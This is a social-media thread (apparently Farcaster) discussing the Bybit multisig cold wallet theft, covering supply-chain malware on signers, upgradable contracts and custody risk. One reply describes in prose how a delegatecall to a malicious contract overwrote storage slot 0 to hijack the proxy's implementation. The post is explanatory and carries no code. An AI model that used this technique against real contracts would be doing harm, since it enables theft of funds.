Content
@
https://warpcast.com/~/channel/ethfinance
0 reply
0 recast
0 reaction
Thomas
@aviationdoctor.eth
What a crafty hack. Pyongyang is now on par with Dubai, New York, and Zug for being a hotspot of crypto innovation. If draining a multisig cold wallet managed by a competent professional team is now in the realm of possibilities, how can we expect corporates and normies to embrace the tech (let alone self-custody) without strong layer-0 guarantees and insurance? And if we do implement those, how is it not just TardFi and the FDIC with extra steps?
7 replies
36 recasts
187 reactions
TheModestThief🎩
@thief
is the postmortem out yet?
1 reply
0 recast
2 reactions
Thomas
@aviationdoctor.eth
IDK about a detailed formal PDF yet, but Bybit has explained that their multisig signatories had been hit with malware used to obfuscate the real transaction, which tampered with their smart contract This is an S-tier supply chain attack
1 reply
0 recast
10 reactions
Thomas
@aviationdoctor.eth
But also this suggests an upgradable smart contract, which sounds unnecessarily risky to me for a cold wallet. So I’d also want to know more
1 reply
0 recast
6 reactions
hollymolly.framedl.eth
@hollyr.eth
The attacker created a malicious contract containing a transfer function that used SSTORE operations to write to storage slot 0. When Bybit's multisig executed the delegatecall to what appeared to be a normal transfer, the malicious code was able to modify the proxy contract's implementation address since delegatecall preserves the original contract's storage context. By writing to storage slot 0, which typically contains the implementation address in proxy patterns, the attacker changed the contract's logic implementation to point to their malicious contract
1 reply
0 recast
2 reactions
Thomas
@aviationdoctor.eth
Thanks for the explanation!
0 reply
0 recast
2 reactions
